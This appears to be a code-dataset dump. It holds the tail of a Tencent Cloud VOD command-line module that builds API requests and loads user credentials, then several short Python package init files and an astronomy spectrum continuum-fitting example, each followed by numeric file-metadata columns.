models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAnimatedGraphicsTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAnimatedGraphicsTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAttachMediaSubtitles(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AttachMediaSubtitlesRequest()
model.from_json_string(json.dumps(args))
rsp = client.AttachMediaSubtitles(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyMediaInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyMediaInfoRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyMediaInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteSampleSnapshotTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteSampleSnapshotTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteSampleSnapshotTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doWeChatMiniProgramPublish(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.WeChatMiniProgramPublishRequest()
model.from_json_string(json.dumps(args))
rsp = client.WeChatMiniProgramPublish(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSimpleHlsClip(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SimpleHlsClipRequest()
model.from_json_string(json.dumps(args))
rsp = client.SimpleHlsClip(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreatePersonSample(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreatePersonSampleRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreatePersonSample(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifySubAppIdStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifySubAppIdStatusRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifySubAppIdStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyContentReviewTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyContentReviewTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyContentReviewTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doProcessMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ProcessMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.ProcessMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAIRecognitionTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAIRecognitionTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAIRecognitionTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDailyPlayStatFileList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDailyPlayStatFileListRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeDailyPlayStatFileList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteImageSpriteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteImageSpriteTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteImageSpriteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20180717": vod_client_v20180717,
}
MODELS_MAP = {
"v20180717": models_v20180717,
}
ACTION_MAP = {
"CreateSnapshotByTimeOffsetTemplate": doCreateSnapshotByTimeOffsetTemplate,
"EditMedia": doEditMedia,
"DescribeVodDomains": doDescribeVodDomains,
"ApplyUpload": doApplyUpload,
"DeleteAnimatedGraphicsTemplate": doDeleteAnimatedGraphicsTemplate,
"DescribeAIAnalysisTemplates": doDescribeAIAnalysisTemplates,
"PullEvents": doPullEvents,
"ProcessMediaByProcedure": doProcessMediaByProcedure,
"DeleteTranscodeTemplate": doDeleteTranscodeTemplate,
"DescribeTaskDetail": doDescribeTaskDetail,
"DescribeReviewDetails": doDescribeReviewDetails,
"DescribeWordSamples": doDescribeWordSamples,
"DescribeStorageData": doDescribeStorageData,
"ModifyAIAnalysisTemplate": doModifyAIAnalysisTemplate,
"DeleteProcedureTemplate": doDeleteProcedureTemplate,
"DeleteAdaptiveDynamicStreamingTemplate": doDeleteAdaptiveDynamicStreamingTemplate,
"CreateAdaptiveDynamicStreamingTemplate": doCreateAdaptiveDynamicStreamingTemplate,
"DescribeSampleSnapshotTemplates": doDescribeSampleSnapshotTemplates,
"DeleteSnapshotByTimeOffsetTemplate": doDeleteSnapshotByTimeOffsetTemplate,
"DescribeCdnLogs": doDescribeCdnLogs,
"ModifyClass": doModifyClass,
"DescribeTasks": doDescribeTasks,
"ResetProcedureTemplate": doResetProcedureTemplate,
"DescribeCDNUsageData": doDescribeCDNUsageData,
"CreateTranscodeTemplate": doCreateTranscodeTemplate,
"DescribeCDNStatDetails": doDescribeCDNStatDetails,
"ModifyImageSpriteTemplate": doModifyImageSpriteTemplate,
"DeleteClass": doDeleteClass,
"ExecuteFunction": doExecuteFunction,
"DeleteVodDomain": doDeleteVodDomain,
"DescribeMediaProcessUsageData": doDescribeMediaProcessUsageData,
"ConfirmEvents": doConfirmEvents,
"ComposeMedia": doComposeMedia,
"CreateContentReviewTemplate": doCreateContentReviewTemplate,
"CreateSampleSnapshotTemplate": doCreateSampleSnapshotTemplate,
"DeleteAIAnalysisTemplate": doDeleteAIAnalysisTemplate,
"DescribeMediaInfos": doDescribeMediaInfos,
"LiveRealTimeClip": doLiveRealTimeClip,
"PullUpload": doPullUpload,
"ModifySampleSnapshotTemplate": doModifySampleSnapshotTemplate,
"ModifyVodDomainAccelerateConfig": doModifyVodDomainAccelerateConfig,
"DeleteSuperPlayerConfig": doDeleteSuperPlayerConfig,
"DescribeProcedureTemplates": doDescribeProcedureTemplates,
"DescribeTranscodeTemplates": doDescribeTranscodeTemplates,
"ParseStreamingManifest": doParseStreamingManifest,
"CreateProcedureTemplate": doCreateProcedureTemplate,
"PushUrlCache": doPushUrlCache,
"DeleteMedia": doDeleteMedia,
"CreateSuperPlayerConfig": doCreateSuperPlayerConfig,
"ModifyPersonSample": doModifyPersonSample,
"DeleteContentReviewTemplate": doDeleteContentReviewTemplate,
"CreateAIAnalysisTemplate": doCreateAIAnalysisTemplate,
"ModifyVodDomainConfig": doModifyVodDomainConfig,
"DescribeSnapshotByTimeOffsetTemplates": doDescribeSnapshotByTimeOffsetTemplates,
"ProcessMediaByUrl": doProcessMediaByUrl,
"ModifyTranscodeTemplate": doModifyTranscodeTemplate,
"DescribeContentReviewTemplates": doDescribeContentReviewTemplates,
"ModifyWatermarkTemplate": doModifyWatermarkTemplate,
"DescribeStorageDetails": doDescribeStorageDetails,
"DeleteWordSamples": doDeleteWordSamples,
"CreateVodDomain": doCreateVodDomain,
"CreateImageSpriteTemplate": doCreateImageSpriteTemplate,
"DescribePersonSamples": doDescribePersonSamples,
"DeleteAIRecognitionTemplate": doDeleteAIRecognitionTemplate,
"CreateSubAppId": doCreateSubAppId,
"DescribeAnimatedGraphicsTemplates": doDescribeAnimatedGraphicsTemplates,
"ForbidMediaDistribution": doForbidMediaDistribution,
"ManageTask": doManageTask,
"ModifySnapshotByTimeOffsetTemplate": doModifySnapshotByTimeOffsetTemplate,
"ModifySuperPlayerConfig": doModifySuperPlayerConfig,
"CreateClass": doCreateClass,
"CreateWordSamples": doCreateWordSamples,
"ModifySubAppIdInfo": doModifySubAppIdInfo,
"DescribeAdaptiveDynamicStreamingTemplates": doDescribeAdaptiveDynamicStreamingTemplates,
"ModifyWordSample": doModifyWordSample,
"DescribeImageSpriteTemplates": doDescribeImageSpriteTemplates,
"DescribeAllClass": doDescribeAllClass,
"DescribeWatermarkTemplates": doDescribeWatermarkTemplates,
"CreateWatermarkTemplate": doCreateWatermarkTemplate,
"DescribeAIRecognitionTemplates": doDescribeAIRecognitionTemplates,
"DescribeSuperPlayerConfigs": doDescribeSuperPlayerConfigs,
"DescribeSubAppIds": doDescribeSubAppIds,
"CommitUpload": doCommitUpload,
"ModifyAIRecognitionTemplate": doModifyAIRecognitionTemplate,
"ModifyAdaptiveDynamicStreamingTemplate": doModifyAdaptiveDynamicStreamingTemplate,
"SearchMedia": doSearchMedia,
"DeleteWatermarkTemplate": doDeleteWatermarkTemplate,
"DeletePersonSample": doDeletePersonSample,
"CreateAnimatedGraphicsTemplate": doCreateAnimatedGraphicsTemplate,
"ModifyAnimatedGraphicsTemplate": doModifyAnimatedGraphicsTemplate,
"AttachMediaSubtitles": doAttachMediaSubtitles,
"ModifyMediaInfo": doModifyMediaInfo,
"DeleteSampleSnapshotTemplate": doDeleteSampleSnapshotTemplate,
"WeChatMiniProgramPublish": doWeChatMiniProgramPublish,
"SimpleHlsClip": doSimpleHlsClip,
"CreatePersonSample": doCreatePersonSample,
"ModifySubAppIdStatus": doModifySubAppIdStatus,
"ModifyContentReviewTemplate": doModifyContentReviewTemplate,
"ProcessMedia": doProcessMedia,
"CreateAIRecognitionTemplate": doCreateAIRecognitionTemplate,
"DescribeDailyPlayStatFileList": doDescribeDailyPlayStatFileList,
"DeleteImageSpriteTemplate": doDeleteImageSpriteTemplate,
}
AVAILABLE_VERSION_LIST = [
"v20180717",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["vod"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["vod"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return g_param
| 44.451907
| 105
| 0.733295
| 14,709
| 131,711
| 6.324495
| 0.029166
| 0.080106
| 0.230589
| 0.057854
| 0.848657
| 0.846754
| 0.84598
| 0.845206
| 0.844196
| 0.797091
| 0
| 0.008037
| 0.160154
| 131,711
| 2,962
| 106
| 44.466914
| 0.832946
| 0.007904
| 0
| 0.739726
| 0
| 0
| 0.042469
| 0.012431
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039574
| false
| 0
| 0.004566
| 0.000381
| 0.044901
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fc3b0ea50bbf83e496e3d60c4dc862f7a5144180
| 155
|
py
|
Python
|
mdp/orderbook/__init__.py
|
mehazardtfgm/sbedecoder
|
375e2d1f9557778170bdf3c3f0c36e721f013f52
|
[
"MIT"
] | 65
|
2016-01-31T18:38:37.000Z
|
2022-03-05T01:11:10.000Z
|
mdp/orderbook/__init__.py
|
mehazardtfgm/sbedecoder
|
375e2d1f9557778170bdf3c3f0c36e721f013f52
|
[
"MIT"
] | 22
|
2015-08-24T19:11:42.000Z
|
2020-05-07T18:01:19.000Z
|
mdp/orderbook/__init__.py
|
mehazardtfgm/sbedecoder
|
375e2d1f9557778170bdf3c3f0c36e721f013f52
|
[
"MIT"
] | 50
|
2015-08-20T14:57:59.000Z
|
2022-03-05T01:11:12.000Z
|
from .orderbook import OrderBookEntry
from .orderbook import OrderBook
from .packet_processor import PacketProcessor
from .orderbook import ConsolePrinter
| 31
| 45
| 0.870968
| 17
| 155
| 7.882353
| 0.470588
| 0.291045
| 0.425373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103226
| 155
| 4
| 46
| 38.75
| 0.964029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc52bf695a8e615af714422f1e894c9cbb16aa0c
| 303
|
py
|
Python
|
pines_analysis_toolkit/__init__.py
|
patricktamburo/pines_analysis_toolkit
|
d528d757cc1a7e0d8b7a599106814ff529b4ab77
|
[
"MIT"
] | 1
|
2020-06-05T21:18:09.000Z
|
2020-06-05T21:18:09.000Z
|
pines_analysis_toolkit/__init__.py
|
patricktamburo/pines_analysis_toolkit
|
d528d757cc1a7e0d8b7a599106814ff529b4ab77
|
[
"MIT"
] | 2
|
2021-01-27T16:57:23.000Z
|
2022-02-10T07:22:05.000Z
|
pines_analysis_toolkit/__init__.py
|
patricktamburo/pines_analysis_toolkit
|
d528d757cc1a7e0d8b7a599106814ff529b4ab77
|
[
"MIT"
] | null | null | null |
import pines_analysis_toolkit.data
import pines_analysis_toolkit.photometry
import pines_analysis_toolkit.analysis
import pines_analysis_toolkit.utils
import pines_analysis_toolkit.observing
import pines_analysis_toolkit.output
import pines_analysis_toolkit.pwv
import pines_analysis_toolkit.astrometry
| 33.666667
| 40
| 0.920792
| 40
| 303
| 6.575
| 0.275
| 0.334601
| 0.577947
| 0.790875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052805
| 303
| 8
| 41
| 37.875
| 0.916376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc643f7f9b349b21e21c884c9a40c6d98fc44535
| 142
|
py
|
Python
|
school_students_analysis/__init__.py
|
krzpiesiewicz/nypd2020z-school-students-analysis
|
5b7195b15e8a4e68093bf2750f52199692fa3146
|
[
"MIT"
] | null | null | null |
school_students_analysis/__init__.py
|
krzpiesiewicz/nypd2020z-school-students-analysis
|
5b7195b15e8a4e68093bf2750f52199692fa3146
|
[
"MIT"
] | null | null | null |
school_students_analysis/__init__.py
|
krzpiesiewicz/nypd2020z-school-students-analysis
|
5b7195b15e8a4e68093bf2750f52199692fa3146
|
[
"MIT"
] | null | null | null |
from .students_per_teacher import students_per_teacher_by_the_type_of_school
from .students_by_year_of_birth import students_by_year_of_birth
| 47.333333
| 76
| 0.929577
| 25
| 142
| 4.6
| 0.48
| 0.208696
| 0.313043
| 0.278261
| 0.365217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056338
| 142
| 2
| 77
| 71
| 0.858209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fc662d55bcf2a100a4845a8ae6108ae1826800ed
| 3,403
|
py
|
Python
|
examples/cont_example.py
|
AminFarhang/edibles
|
e148291d7f11932f228e58b2e2e6101bb82c3f24
|
[
"MIT"
] | 8
|
2020-04-15T10:44:48.000Z
|
2021-06-21T15:58:19.000Z
|
examples/cont_example.py
|
AminFarhang/edibles
|
e148291d7f11932f228e58b2e2e6101bb82c3f24
|
[
"MIT"
] | 100
|
2020-05-08T13:20:41.000Z
|
2022-01-11T20:04:52.000Z
|
examples/cont_example.py
|
jancami/edibles
|
51263b24c5e8aef786692011289b906a810ad2f7
|
[
"MIT"
] | 8
|
2020-05-27T00:39:39.000Z
|
2021-06-23T14:07:16.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from edibles.models import ContinuumModel
from edibles.utils.edibles_spectrum import EdiblesSpectrum
# #################################################################################
# Example 1
x = np.linspace(0, 3)
y = x**3 - 3 * x**2 + 1
cont_model = ContinuumModel(n_anchors=4)
cont_pars = cont_model.guess(y, x=x)
# ##############################
# Show initial model
out = cont_model.eval(data=y, params=cont_pars, x=x)
y_param_names = []
for i in range(cont_model.n_anchors):
y_param_names.append('y_' + str(i))
x_param_names = []
for i in range(cont_model.n_anchors):
x_param_names.append('x_' + str(i))
init_y = []
for par_name in y_param_names:
init_y.append(cont_pars[par_name].value)
init_x = []
for par_name in x_param_names:
init_x.append(cont_pars[par_name].value)
plt.scatter(x, y)
plt.plot(x, out, 'C1')
plt.scatter(init_x, init_y, marker='x', s=80, color='k')
plt.show()
# ##############################
# Fit
result = cont_model.fit(data=y, params=cont_pars, x=x)
out = cont_model.eval(data=y, params=result.params, x=x)
# print(result.fit_report())
# ##############################
# Show results
result_y_pars = []
for par_name in y_param_names:
result_y_pars.append(result.params[par_name].value)
result_x_pars = []
for par_name in x_param_names:
result_x_pars.append(result.params[par_name].value)
result.plot_fit()
plt.scatter(result_x_pars, result_y_pars, marker='x',
color='r', s=80, zorder=10, label='Fit params')
plt.scatter(init_x, init_y, marker='x', s=80, color='k', label='Initial params')
plt.legend()
plt.show()
# #################################################################################
# Example 2
# #################################################################################
sp = EdiblesSpectrum("/HD23466/BLUE_346/HD23466_w346_blue_20180731_O11.fits")
xmin = 3270
xmax = 3305
sp.getSpectrum(xmin=xmin, xmax=xmax)
cont_model = ContinuumModel(n_anchors=4)
cont_pars = cont_model.guess(sp.flux, x=sp.wave)
# ##############################
# Show initial model
out = cont_model.eval(data=sp.flux, params=cont_pars, x=sp.wave)
y_param_names = []
for i in range(cont_model.n_anchors):
y_param_names.append('y_' + str(i))
x_param_names = []
for i in range(cont_model.n_anchors):
x_param_names.append('x_' + str(i))
init_y = []
for par_name in y_param_names:
init_y.append(cont_pars[par_name].value)
init_x = []
